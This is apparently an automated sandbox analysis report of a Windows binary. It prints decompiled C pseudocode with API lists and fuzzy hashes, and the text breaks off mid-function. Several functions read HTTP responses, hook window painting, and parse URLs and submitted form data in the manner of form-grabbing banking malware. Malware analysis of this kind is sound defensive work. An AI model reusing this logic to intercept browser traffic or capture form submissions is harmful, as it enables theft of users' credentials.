        • CreateFileW.KERNEL32(00000000,C0000000,00000001,00000000,00000004,00000080,00000000,00000000,00000000), ref: 00416DB1
          • Part of subcall function 004161F4: GetFileSizeEx.KERNEL32(00416DC8,00416DC8,?,?,?,00416DC8,00000000), ref: 00416200
        • ReadFile.KERNEL32(?,?,00000005,00000000,00000000,00000000), ref: 00416DF2
        • CloseHandle.KERNEL32(?,00000000), ref: 00416DFE
        • ReadFile.KERNEL32(?,?,00000005,00000005,00000000,?,?,00000000,00000001), ref: 00416E6D
        • SetEndOfFile.KERNEL32(?,?,?,?,00000000), ref: 00416E93
        Memory Dump Source
        • Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp
        Similarity
        • API ID: File$Read$CloseCreateHandleSize
        • String ID:
        • API String ID: 1850650832-0
        • Opcode ID: 9ceb93a8348408447dc3fc6eb98dfe00057802ecaaaa929ba728ad1dcc490e41
        • Instruction ID: af5e63905789dcd979fed50711508695782ab0390cc234c6f94ae631fd7896fa
        • Opcode Fuzzy Hash: 9ceb93a8348408447dc3fc6eb98dfe00057802ecaaaa929ba728ad1dcc490e41
        • Instruction Fuzzy Hash: 2541BE34900349AAEF208F65CC45BEFBFB9EF84310F11422EE595A22A0C7398991CB59
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 84%
        			E004174C5(void* __ecx, signed int __edx, void* __eflags, struct HDC__* _a4, BITMAPINFO** _a8, void** _a12, void* _a16, long _a20, void* _a24) {
        				int _v8;
        				void* _t37;
        				long _t38;
        				struct HBITMAP__* _t46;
        				void* _t47;
        				signed int _t56;
        				signed int _t57;
        				BITMAPINFO** _t62;
        				BITMAPINFO* _t64;
        
        				_t57 = __edx;
        				_v8 = 0;
        				_t64 = E004110D6(0x428);
        				if(_t64 == 0) {
        					L14:
        					if(_a24 != 0) {
        						DeleteObject(_a24);
        					}
        					L16:
        					return _v8;
        				}
        				_t64->bmiHeader = 0x28;
        				if(GetDIBits(_a4, _a24, 0, 1, 0, _t64, 0) == 0 || GetDIBits(_a4, _a24, 0, 1, 0, _t64, 0) == 0) {
        					L13:
        					E00411106(_t64);
        					goto L14;
        				} else {
        					DeleteObject(_a24);
        					asm("cdq");
        					_t56 =  ~((_t64->bmiHeader.biHeight ^ __edx) - __edx);
        					_t37 = (_t64->bmiHeader.biBitCount & 0x0000ffff) - 1;
        					_a24 = 0;
        					_t64->bmiHeader.biHeight = _t56;
        					if(_t37 == 0) {
        						L7:
        						_t64->bmiHeader.biClrUsed = 0;
        						_push(8);
        						_t64->bmiHeader.biClrImportant = 0;
        						L8:
        						_pop(_t38);
        						_t64->bmiHeader.biBitCount = _t38;
        						L9:
        						_t62 = _a8;
        						asm("cdq");
        						_t58 = _t57 & 0x00000007;
        						asm("cdq");
        						_t64->bmiHeader.biSizeImage = ((_t64->bmiHeader.biBitCount & 0x0000ffff) * _t64->bmiHeader.biWidth * _t56 + (_t57 & 0x00000007) >> 0x00000003 ^ _t58) - _t58;
        						_t64->bmiHeader.biCompression = 0;
        						if(_t62 != 0) {
        							 *_t62 = _t64;
        						}
        						_t46 = CreateDIBSection(_a4, _t64, 0, _a12, _a16, _a20);
        						_v8 = _t46;
        						if(_t46 == 0 || _t62 == 0) {
        							goto L13;
        						} else {
        							goto L16;
        						}
        					}
        					_t47 = _t37 - 3;
        					if(_t47 == 0) {
        						goto L7;
        					}
        					if(_t47 != 0x14) {
        						goto L9;
        					}
        					_push(0x20);
        					goto L8;
        				}
        			}

        APIs
        • GetDIBits.GDI32(00000000,00417F5D,00000000,00000001,00000000,00000000,00000000), ref: 004174FD
        • GetDIBits.GDI32(00000000,00417F5D,00000000,00000001,00000000,00000000,00000000), ref: 00417513
        • DeleteObject.GDI32(00417F5D), ref: 00417520
        • CreateDIBSection.GDI32(00000000,00000000,00000000,0041FE98,?,?), ref: 00417590
        • DeleteObject.GDI32(00417F5D), ref: 004175AF
        Memory Dump Source
        • Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp
        Similarity
        • API ID: BitsDeleteObject$CreateSection
        • String ID:
        • API String ID: 1423349713-0
        • Opcode ID: 0cfd237c4eef3904ea3a82b9894ab845c153d853e9ecbd1c360aed248bf78e22
        • Instruction ID: 8845a8ea70f08d9d83179162ad48cd3c6d6fc1a73520827836dd3c4a6c13790b
        • Opcode Fuzzy Hash: 0cfd237c4eef3904ea3a82b9894ab845c153d853e9ecbd1c360aed248bf78e22
        • Instruction Fuzzy Hash: 243193B210120ABFDF208F25CD849AB7ABAEF44344B04842EF646D6A60D735DD91DB64
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 68%
        			E0040F97B(intOrPtr* __edi, void* __eflags, intOrPtr _a4, void* _a8, intOrPtr* _a12) {
        				char _v9;
        				intOrPtr _v16;
        				signed int _v20;
        				intOrPtr _v36;
        				intOrPtr _v40;
        				char _v60;
        				void* __esi;
        				intOrPtr _t31;
        				signed int _t32;
        				char* _t37;
        				intOrPtr* _t58;
        				char _t61;
        				intOrPtr* _t62;
        				intOrPtr _t63;
        
        				_t62 = __edi;
        				ResetEvent(_a8);
        				_t31 = E004110D6(0x1000);
        				_t63 = 0;
        				_v16 = _t31;
        				if(_t31 != 0) {
        					_t58 = __imp__InternetSetStatusCallbackW;
        					_t32 =  *_t58(_a4, E0040F932);
        					_t61 = 0x28;
        					_v20 = _t32;
        					 *_a12 = 0;
        					 *__edi = 0;
        					_v9 = 1;
        					E004111B9( &_v60,  &_v60, 0, _t61);
        					_v60 = _t61;
        					_v40 = _v16;
        					while(1) {
        						L3:
        						_t37 =  &_v60;
        						_v36 = 0x1000;
        						__imp__InternetReadFileExA(_a4, _t37, 8, _t63);
        						if(_t37 == 0) {
        							break;
        						}
        						if(_v36 == _t63) {
        							L10:
        							asm("sbb eax, eax");
        							 *_t58(_a4,  ~(_v20 + 1) & _v20);
        							E00411106(_v16);
        							if(_v9 == 0) {
        								E00411106( *_a12);
        							}
        							return _v9;
        						}
        						_t64 = _a12;
        						if(E00411091( *_t62 + _v36, _a12) == 0) {
        							L9:
        							_v9 = 0;
        							goto L10;
        						}
        						E00411142( *_t64 +  *_t62, _v16, _v36);
        						 *_t62 =  *_t62 + _v36;
        						_t63 = 0;
        					}
        					if(GetLastError() != 0x3e5) {
        						goto L9;
        					}
        					E0041474D( &_a8);
        					goto L3;
        				}
        				E00411106(0);
        				return 0;
        			}

        APIs
        • ResetEvent.KERNEL32(?), ref: 0040F986
        • InternetSetStatusCallbackW.WININET(?,0040F932), ref: 0040F9BA
        • InternetReadFileExA.WININET(?,?,00000008,00000000), ref: 0040F9F2
        • GetLastError.KERNEL32 ref: 0040F9FC
        • InternetSetStatusCallbackW.WININET(?,?), ref: 0040FA58
          • Part of subcall function 00411106: HeapFree.KERNEL32(00000000,00000000,004128FD,00000000,?,?,?,0040628D,00000000,0040675B), ref: 00411119
        Memory Dump Source
        • Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp
        Similarity
        • API ID: Internet$CallbackStatus$ErrorEventFileFreeHeapLastReadReset
        • String ID:
        • API String ID: 4044253124-0
        • Opcode ID: 852f289fce787ac1969f70afe0bc588cc0404e9f859c9d8082bdff31d1b9dc91
        • Instruction ID: 3012ed8b2ed201dd0237cfda8da11f943c7df3a384b5cbea96ddeadc3d2aed2a
        • Opcode Fuzzy Hash: 852f289fce787ac1969f70afe0bc588cc0404e9f859c9d8082bdff31d1b9dc91
        • Instruction Fuzzy Hash: A6314771900219BFCF11EFA5DC45AEEBBB8BF08348F044076F944A72A1D7789994CB69
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E00418B1A(void* __ebx, void* __ecx, void* __edx, void* __eflags) {
        				void* _v8;
        				long _v12;
        				void* _v16;
        				char _v32;
        				void _v360;
        				short _v880;
        				void* __edi;
        				void* __esi;
        				void* _t18;
        				void* _t25;
        				void* _t26;
        				long _t39;
        				void* _t42;
        				void* _t44;
        				long _t47;
        
        				_t48 =  &_v32;
        				_t18 = 0x2b;
        				_v16 = __edx;
        				_t44 = __ecx;
        				E0040CA33(_t18,  &_v32);
        				if(E00416745(_t48,  &_v880, _t44) == 0) {
        					L11:
        					return 1;
        				}
        				_t25 = CreateFileW( &_v880, 0x40000000, 1, 0, 2, 0x80, 0);
        				_v8 = _t25;
        				if(_t25 == 0xffffffff) {
        					goto L11;
        				}
        				_t26 = 0x30;
        				_t39 = 0;
        				E0040C9FD(_t26,  &_v360);
        				if(WriteFile(_v8,  &_v360, 0x146,  &_v12, 0) == 0 || _v12 != 0x146) {
        					L9:
        					FlushFileBuffers(_v8);
        					CloseHandle(_v8);
        					if(_t39 == 0) {
        						E0041621B( &_v880);
        					}
        					goto L11;
        				} else {
        					_t42 = _v16;
        					if(_t42 == 0) {
        						L7:
        						_t39 = 1;
        						goto L9;
        					}
        					_t47 = E00411C43(_t42);
        					if(WriteFile(_v8, _t42, _t47,  &_v12, 0) == 0 || _v12 != _t47) {
        						_t39 = 0;
        						goto L9;
        					} else {
        						goto L7;
        					}
        				}
        			}

        APIs
          • Part of subcall function 00416745: PathCombineW.SHLWAPI(004063CA,004063CA,?,004063CA,?,?), ref: 00416764
        • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000,?,?,?,00000000), ref: 00418B65
        • WriteFile.KERNEL32(00418B02,?,00000146,?,00000000,00000000), ref: 00418BA3
        • WriteFile.KERNEL32(00418B02,?,00000000,?,00000000), ref: 00418BC7
        • FlushFileBuffers.KERNEL32(00418B02), ref: 00418BDB
        • CloseHandle.KERNEL32(00418B02), ref: 00418BE4
        Memory Dump Source
        • Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp
        Similarity
        • API ID: File$Write$BuffersCloseCombineCreateFlushHandlePath
        • String ID:
        • API String ID: 2459967240-0
        • Opcode ID: d06bc370a8dffb5ac8c15034394ae1eab505b718bb91091fc3a3f67d009960cb
        • Instruction ID: ddd1bfeaa9147b330be2aec40cbb85618cfe323044223405ff1c74036eb9d3c8
        • Opcode Fuzzy Hash: d06bc370a8dffb5ac8c15034394ae1eab505b718bb91091fc3a3f67d009960cb
        • Instruction Fuzzy Hash: 8021BFB1940118BBCF20AB61CC45FDF7BBCAB45314F1042AAB504F3190DB35AE81CB54
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E00405CB2(void* __ecx, void* __eflags) {
        				intOrPtr _v8;
        				intOrPtr _v12;
        				char _v104;
        				char _v204;
        				char _v724;
        				void* __edi;
        				void* __esi;
        				intOrPtr _t18;
        				void* _t24;
        				long _t28;
        				long _t35;
        				void* _t40;
        				WCHAR* _t43;
        				void* _t50;
        
        				_t50 = __eflags;
        				_t40 = __ecx;
        				SetThreadPriority(GetCurrentThread(), 0);
        				_t18 = E004069FD(_t40, _t50, 0xf7b027d4, 1);
        				_v12 = _t18;
        				if(_t18 != 0) {
        					E004069C2(0xc003c81e,  &_v204, 0);
        					_t43 =  &_v724;
        					E00406D1E(_t40, _t43, 1);
        					PathQuoteSpacesW(_t43);
        					_t41 = _t43;
        					_v8 = E00411C55(_t43);
        					_t24 = E00406B23();
        					__eflags = _t24;
        					if(_t24 == 0) {
        						L7:
        						E004147B3(_v12);
        						__eflags = 0;
        						return 0;
        					}
        					E0040CA33(0,  &_v104);
        					_t28 = WaitForSingleObject( *0x41ea9c, 0xc8);
        					__eflags = _t28 - 0x102;
        					if(_t28 != 0x102) {
        						L6:
        						goto L7;
        					}
        					_v8 = _v8 + _v8 + 2;
        					do {
        						E0041522E(_t41,  &_v104,  &_v204, 1,  &_v724, _v8);
        						_t35 = WaitForSingleObject( *0x41ea9c, 0xc8);
        						__eflags = _t35 - 0x102;
        					} while (_t35 == 0x102);
        					goto L6;
        				}
        				return _t18 + 1;
        			}

        APIs
        • GetCurrentThread.KERNEL32 ref: 00405CBD
        • SetThreadPriority.KERNEL32(00000000), ref: 00405CC4
          • Part of subcall function 004069FD: CreateMutexW.KERNEL32(0041E5C8,00000000,?,?,?,?,?), ref: 00406A1E
        • PathQuoteSpacesW.SHLWAPI(?,00000001,C003C81E,?,00000000,?,F7B027D4,00000001), ref: 00405D07
        • WaitForSingleObject.KERNEL32(000000C8,?,?,?,F7B027D4,00000001), ref: 00405D3E
        • WaitForSingleObject.KERNEL32(000000C8,?,?,00000001,?,?,?,?,?,F7B027D4,00000001), ref: 00405D74
        Memory Dump Source
        • Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp
        Similarity
        • API ID: ObjectSingleThreadWait$CreateCurrentMutexPathPriorityQuoteSpaces
        • String ID:
        • API String ID: 123286213-0
        • Opcode ID: 63adb9bd918dbbf607ef7279a227f78cdb634426369938d8cc968c84cd39e481
        • Instruction ID: 8628f203322232fd24c6a974c4b0cf549ed89b50ca26a13031dcba1933e09a46
        • Opcode Fuzzy Hash: 63adb9bd918dbbf607ef7279a227f78cdb634426369938d8cc968c84cd39e481
        • Instruction Fuzzy Hash: 35218E71A00608AEDF10ABA0DD49FEE7BB9EF44344F1044B6F905F71A1DA389E858F58
        Uniqueness

        Uniqueness Score: -1.00%

        APIs
        • socket.WS2_32(000000FF,00000002,00000000), ref: 00414517
        • WSAIoctl.WS2_32(00000000,48000016,00000000,00000000,00020000,00000000,00020000,00000000,00000000), ref: 00414541
        • WSAGetLastError.WS2_32 ref: 00414548
        • WSAIoctl.WS2_32(00000000,48000016,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00414574
          • Part of subcall function 00411106: HeapFree.KERNEL32(00000000,00000000,004128FD,00000000,?,?,?,0040628D,00000000,0040675B), ref: 00411119
        • closesocket.WS2_32(?), ref: 00414588
        Memory Dump Source
        • Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp
        Similarity
        • API ID: Ioctl$ErrorFreeHeapLastclosesocketsocket
        • String ID:
        • API String ID: 2355469559-0
        • Opcode ID: ed66087fac3d01aff63777bcbaadb0e7481c36297b866ade3ee5f9b77589b154
        • Instruction ID: 40a1ef576042988080b874db43333e93dcdccbbe38b342f44f900c88b808c770
        • Opcode Fuzzy Hash: ed66087fac3d01aff63777bcbaadb0e7481c36297b866ade3ee5f9b77589b154
        • Instruction Fuzzy Hash: 641151B1801128BFCB109FA6DD48CDF7E3DEF453A4B104615F605A2160D6349F80DBA4
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 93%
        			E00417BF9(struct HWND__* _a4, struct tagRECT* _a8, int _a12) {
        				int _t20;
        				signed int _t21;
        				struct HWND__* _t28;
        				char* _t32;
        
        				_t28 = _a4;
        				if(( *0x41e590 & 0x00000004) == 0 || E00406B23() == 0) {
        					L9:
        					return GetUpdateRect(_t28, _a8, _a12);
        				} else {
        					_t32 = TlsGetValue( *0x41fe7c);
        					if(_t32 == 0 || _t28 !=  *((intOrPtr*)(_t32 + 4))) {
        						goto L9;
        					} else {
        						if(_a8 != 0) {
        							_t6 = _t32 + 0xc; // 0xc
        							E00411142( &_a8, _t6, 0x10);
        						}
        						if(_a12 != 0) {
        							_t20 = SaveDC( *(_t32 + 8));
        							_t21 = SendMessageW(_t28, 0x14,  *(_t32 + 8), 0);
        							asm("sbb eax, eax");
        							 *((intOrPtr*)(_t32 + 0x1c)) =  ~_t21 + 1;
        							RestoreDC( *(_t32 + 8), _t20);
        						}
        						 *_t32 = 1;
        						return 1;
        					}
        				}
        			}

        APIs
        • GetUpdateRect.USER32 ref: 00417C80
          • Part of subcall function 00406B23: WaitForSingleObject.KERNEL32(00000000,00409585,000002E8,00000000,000002E8,2C7DCEF4,00000002), ref: 00406B2B
        • TlsGetValue.KERNEL32 ref: 00417C19
        • SaveDC.GDI32(?), ref: 00417C49
        • SendMessageW.USER32(?,00000014,?,00000000), ref: 00417C59
        • RestoreDC.GDI32(?,00000000), ref: 00417C6B
        Memory Dump Source
        • Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp
        Similarity
        • API ID: MessageObjectRectRestoreSaveSendSingleUpdateValueWait
        • String ID:
        • API String ID: 3142230470-0
        • Opcode ID: e6ac6a8f29ece36e84aab840dca4c2c3a9e1bb18d26acaaa8b9c18a39ca4386b
        • Instruction ID: f8323f6d0f1f5df3ecf16503b86fdfae8f5e8557247354b8ac0f787962a5127d
        • Opcode Fuzzy Hash: e6ac6a8f29ece36e84aab840dca4c2c3a9e1bb18d26acaaa8b9c18a39ca4386b
        • Instruction Fuzzy Hash: 0111C231004305EFCB319F61DD48FDB7BB9EB09310F04892AFA9692271DB399480CBA8
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 91%
        			E00417D20() {
        				struct tagMSG _v32;
        				signed int _t12;
        				char _t17;
        				void* _t21;
        
        				SetThreadPriority(GetCurrentThread(), 1);
        				SetEvent( *0x41fe84);
        				while(1) {
        					_t12 = GetMessageW( &_v32, 0xffffffff, 0, 0);
        					if(_t12 == 0xffffffff) {
        						break;
        					}
        					if(_t12 == 0) {
        						break;
        					}
        					if(_v32.message ==  *0x41fe80 && _v32.wParam == 0xfffffffc) {
        						_t17 = E004176A1( *0x41fe88 + 0x114, _t19, _t21, 0x41fe78, _v32.lParam, 1);
        						_t19 =  *0x41fe88;
        						 *((char*)( *0x41fe88 + 0x124)) = _t17;
        						SetEvent( *0x41fe84);
        					}
        				}
        				return _t12 & 0xffffff00 | _t12 == 0x00000000;
        			}

        APIs
        • GetCurrentThread.KERNEL32 ref: 00417D2D
        • SetThreadPriority.KERNEL32(00000000,?,?,?,?,?,?,?,?,00407563), ref: 00417D34
        • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,00407563), ref: 00417D46
        • SetEvent.KERNEL32(0041FE78,?,00000001), ref: 00417D93
        • GetMessageW.USER32(?,000000FF,00000000,00000000), ref: 00417DA0
        Memory Dump Source
        • Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp
        Similarity
        • API ID: EventThread$CurrentMessagePriority
        • String ID:
        • API String ID: 3943651903-0
        • Opcode ID: ce455df3079921705bc29fff16741a4eedec9aee57f6b9f2d8edc4939ad62b38
        • Instruction ID: 079042112dc577b98d0c4fe3acc05a11c6aa4f89ec6e135c99dbc96148d1bc63
        • Opcode Fuzzy Hash: ce455df3079921705bc29fff16741a4eedec9aee57f6b9f2d8edc4939ad62b38
        • Instruction Fuzzy Hash: 5A01D2311443049BCB10AB78BD05BEA3B75EB88330F20023AF920961F2C670D895C75D
        Uniqueness

        Uniqueness Score: -1.00%

        APIs
        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00405E25
        • ReleaseMutex.KERNEL32(?), ref: 00405E59
        • IsWindow.USER32(?), ref: 00405E60
        • PostMessageW.USER32(?,00000215,00000000), ref: 00405E7A
        • SendMessageW.USER32(?,00000215,00000000), ref: 00405E82
        Memory Dump Source
        • Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp
        Similarity
        • API ID: Message$MutexObjectPostReleaseSendSingleWaitWindow
        • String ID:
        • API String ID: 794275546-0
        • Opcode ID: 93ed71eaa3c4a7e3bc6973d865eb6a909809f71b3b02224eecfd2cdb0d95ae83
        • Instruction ID: 365b3a01fc68c388d3bd3b52691effb8ec8f9afe1a37c7e35ecae49d32f55c7a
        • Opcode Fuzzy Hash: 93ed71eaa3c4a7e3bc6973d865eb6a909809f71b3b02224eecfd2cdb0d95ae83
        • Instruction Fuzzy Hash: BEF0C9752087009FC3219F24D9489B7BBB5FB98751B044A7DF89AA33B1D770A844CB69
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 90%
        			E004085D4(intOrPtr _a4) {
        				char _v9;
        				signed int _v16;
        				signed int _v20;
        				char _v24;
        				void* _v32;
        				char _v36;
        				char _v60;
        				char _v72;
        				intOrPtr _v124;
        				void* _v136;
        				char _v144;
        				char _v248;
        				void* __ebx;
        				void* __edi;
        				void* __esi;
        				intOrPtr _t122;
        				intOrPtr* _t123;
        				char* _t124;
        				void* _t131;
        				void* _t134;
        				void* _t138;
        				void* _t146;
        				void* _t148;
        				char* _t150;
        				void* _t155;
        				void* _t157;
        				void* _t158;
        				void* _t161;
        				void* _t166;
        				intOrPtr _t168;
        				intOrPtr* _t170;
        				void* _t171;
        				void* _t176;
        				intOrPtr _t180;
        				intOrPtr _t181;
        				signed int _t183;
        				intOrPtr _t188;
        				void* _t191;
        				void* _t192;
        				void* _t194;
        				signed int _t200;
        				void* _t204;
        				void* _t207;
        				signed int _t208;
        				void* _t209;
        				void* _t214;
        				char* _t217;
        				intOrPtr _t218;
        				char* _t223;
        				char* _t226;
        				intOrPtr _t228;
        				intOrPtr* _t229;
        				intOrPtr _t230;
        				void* _t234;
        				void* _t237;
        				void* _t240;
        				void* _t274;
        
        				_t207 = 0;
        				_v16 = 0;
        				_v9 = 0xff;
        				EnterCriticalSection(0x41eaa4);
        				_t215 =  *0x41eac0; // 0x0
        				if(_t215 == 0) {
        					L8:
        					_t230 = _a4;
        					L9:
        					LeaveCriticalSection(0x41eaa4);
        					_t122 =  *((intOrPtr*)(_t230 + 0x40));
        					_t244 = _t122 - _t207;
        					if(_t122 == _t207) {
        						L33:
        						if((_v16 & 0x00000001) == 0) {
        							_t181 =  *((intOrPtr*)(_t230 + 0x44));
        							_t261 = _t181 - _t207;
        							if(_t181 != _t207 && E00407E4B(_t215, _t220, _t261, 3, _t181,  *(_t230 + 8),  *(_t230 + 0xc), _t207) != 0) {
        								_v16 = _v16 | 0x00000001;
        							}
        						}
        						if( *(_t230 + 0x20) >= 0x21) {
        							_t176 = 0xe;
        							E0040C9FD(_t176,  &_v72);
        							_t228 =  *((intOrPtr*)(_t230 + 0x1c));
        							if(E00411177( &_v72, _t228, 0x21) == 0) {
        								_t180 =  *((intOrPtr*)(_t228 + 0x21));
        								if(_t180 == 0x3b || _t180 == 0) {
        									_v16 = _v16 | 0x00000010;
        								}
        							}
        						}
        						_t123 =  *((intOrPtr*)(_t230 + 0x2c));
        						_v24 = _t207;
        						if(_t123 == _t207 ||  *_t123 == _t207) {
        							L49:
        							_t124 =  *((intOrPtr*)(_t230 + 0x34));
        							__eflags = _t124 - _t207;
        							if(_t124 == _t207) {
        								goto L57;
        							}
        							__eflags =  *_t124;
        							if( *_t124 == 0) {
        								goto L57;
        							}
        							_t161 = 0x10;
        							E0040CA33(_t161,  &_v144);
        							_t166 = E00411E74( &_v24,  &_v144,  *((intOrPtr*)(_a4 + 0x34)));
        							_t237 = _t237 + 0xc;
        							goto L52;
        						} else {
        							_t170 =  *((intOrPtr*)(_t230 + 0x30));
        							if(_t170 == _t207 ||  *_t170 == _t207) {
        								goto L49;
        							} else {
        								_t171 = 0xf;
        								E0040CA33(_t171,  &_v248);
        								_push( *((intOrPtr*)(_a4 + 0x30)));
        								_t166 = E00411E74( &_v24,  &_v248,  *((intOrPtr*)(_a4 + 0x2c)));
        								_t237 = _t237 + 0x10;
        								L52:
        								if(_t166 > _t207) {
        									_t168 = E004124B5(_v24, _t166 + _t166);
        									_t274 =  *0x41e58c - _t168; // 0x0
        									if(_t274 != 0) {
        										_t58 =  &_v16;
        										 *_t58 = _v16 | 0x00000020;
        										__eflags =  *_t58;
        										 *0x41e58c = _t168;
        									} else {
        										E00411106(_v24);
        										_v24 = _t207;
        									}
        								}
        								_t230 = _a4;
        								L57:
        								if(_v9 != 0xff) {
        									__eflags = _v9 - 1;
        									if(_v9 != 1) {
        										L64:
        										if((_v16 & 0x00000008) == 0) {
        											L90:
        											E00411106(_v24);
        											_t208 = _v16;
        											if((_t208 & 0x00000001) == 0) {
        												if(E00407EB3(_t220, _t230) != 0) {
        													_t208 = _t208 | 0x00000002;
        												}
        												if((_t208 & 0x00000010) != 0 && E0040826D(_t230, _t220) != 0) {
        													_t208 = _t208 | 0x00000004;
        												}
        											}
        											return _t208;
        										}
        										_t130 =  *(_t230 + 0x28);
        										_t209 = 0;
        										if( *(_t230 + 0x28) != 0) {
        											__eflags = _v16 & 0x00000010;
        											if((_v16 & 0x00000010) == 0) {
        												__eflags =  *(_t230 + 0x20);
        												if( *(_t230 + 0x20) != 0) {
        													L89:
        													_v16 = _v16 & 0xfffffff7;
        													goto L90;
        												}
        												_t223 =  &_v36;
        												_t131 = 0xa;
        												E0040C9FD(_t131, _t223);
        												_push(_t223);
        												_push(9);
        												L78:
        												_pop(_t134);
        												_v20 = E00411564(_t134);
        												L79:
        												if(_v20 == 0) {
        													goto L89;
        												}
        												E0040DBE6( &_v32);
        												_t138 = E00411346( *(_t230 + 0xc), 0,  *(_t230 + 8));
        												_t225 = _t138;
        												if(_t138 != 0) {
        													_t220 = 0x3c;
        													E004111B9( &_v136,  &_v136, 0, _t220);
        													_v136 = _t220;
        													if(InternetCrackUrlA( *(_t230 + 8),  *(_t230 + 0xc), 0,  &_v136) == 1) {
        														_t146 = 7;
        														E0040CA33(_t146,  &_v248);
        														_t148 = 0xb;
        														E0040CA33(_t148,  &_v60);
        														_t217 =  *(_a4 + 0x10);
        														_t150 = 0x40310c;
        														_t220 =  ==  ? 0x40310c : _v24;
        														_t234 =  ==  ? 0x40310c : _v32;
        														if(_t217 == 0) {
        															_t217 = "-";
        														}
        														if((_v16 & 0x00000001) != 0) {
        															_t150 =  &_v60;
        														}
        														_push(_v20);
        														_push(_t220);
        														_push(_t234);
        														_push(_t217);
        														_push(_t150);
        														_t155 = E00410F70(_t217, _t220, (0 | _v124 == 0x00000004) + 0xb, (0 | _v124 == 0x00000004) + 0xb, _t225, 0,  &_v248, _t225);
        														_t230 = _a4;
        														_t209 = _t155;
        													}
        													E00411106(_t225);
        												}
        												E00411106(_v32);
        												E00411106(_v20);
        												if(_t209 != 0) {
        													goto L90;
        												} else {
        													goto L89;
        												}
        											}
        											_t220 = E00411564(_t130,  *((intOrPtr*)(_t230 + 0x24)));
        											_v20 = _t220;
        											__eflags = _t220;
        											if(_t220 == 0) {
        												goto L89;
        											}
        											_t157 = 0;
        											__eflags =  *(_t230 + 0x28);
        											if( *(_t230 + 0x28) <= 0) {
        												goto L79;
        											} else {
        												goto L70;
        											}
        											do {
        												L70:
        												_t218 =  *((intOrPtr*)(_t157 + _t220));
        												__eflags = _t218 - 0x26;
        												if(_t218 != 0x26) {
        													__eflags = _t218 - 0x2b;
        													if(_t218 == 0x2b) {
        														 *((char*)(_t157 + _t220)) = 0x20;
        													}
        												} else {
        													 *((char*)(_t157 + _t220)) = 0xa;
        												}
        												_t157 = _t157 + 1;
        												__eflags = _t157 -  *(_t230 + 0x28);
        											} while (_t157 <  *(_t230 + 0x28));
        											goto L79;
        										}
        										_t226 =  &_v36;
        										_t158 = 9;
        										E0040C9FD(_t158, _t226);
        										_push(_t226);
        										_push(7);
        										goto L78;
        									}
        									L63:
        									_v16 = _v16 | 0x00000008;
        									goto L64;
        								}
        								if( *((char*)(_t230 + 0x18)) != 1 ||  *(_t230 + 0x28) <= _t207) {
        									if((_v16 & 0x00000020) == 0) {
        										goto L64;
        									}
        								}
        								goto L63;
        							}
        						}
        					}
        					_t183 = E00416A93( &_v32, _t220, _t244, _t122, 0x4e25, 0x10000000);
        					_t215 = _v32;
        					_v20 = _t183;
        					if(E00411F98(_t183, _v32) == 0) {
        						L32:
        						E00411106(_v20);
        						_t207 = 0;
        						goto L33;
        					}
        					_t229 = _v20;
        					do {
        						_t215 = _t229 + 1;
        						if( *_t215 == 0) {
        							goto L31;
        						}
        						_t188 =  *_t229;
        						if(_t188 == 0x21) {
        							L22:
        							_t229 = _t215;
        							L23:
        							_t220 = 0;
        							_t215 = _t229;
        							if(E00407B90(_t229, 0,  *(_t230 + 8),  *(_t230 + 0xc)) == 0) {
        								goto L31;
        							}
        							_t191 = _t214;
        							if(_t191 == 0) {
        								L29:
        								_v9 = 1;
        								L30:
        								if(_t214 != 2) {
        									goto L32;
        								}
        								goto L31;
        							}
        							_t192 = _t191 - 1;
        							if(_t192 == 0) {
        								_v9 = 0;
        								goto L30;
        							}
        							_t194 = _t192;
        							if(_t194 == 0) {
        								_v9 = 0xff;
        								E0040845B(_t215, 0, E00411346( *(_t230 + 0xc), 0,  *(_t230 + 8)),  *((intOrPtr*)(_t230 + 0x10)), 0);
        								goto L30;
        							}
        							if(_t194 != 1) {
        								goto L30;
        							}
        							_v16 = _v16 | 0x00000001;
        							goto L29;
        						}
        						if(_t188 == 0x2d) {
        							goto L22;
        						}
        						if(_t188 == 0x40) {
        							goto L22;
        						}
        						if(_t188 == 0x5e) {
        							_t214 = 4;
        							goto L22;
        						}
        						_t214 = 0;
        						goto L23;
        						L31:
        						_t229 = E00411FD6(_t229, 1);
        					} while (_t229 != 0);
        					goto L32;
        				}
        				_t240 =  *0x41eabc - _t207; // 0x0
        				if(_t240 == 0) {
        					goto L8;
        				}
        				_t230 = _a4;
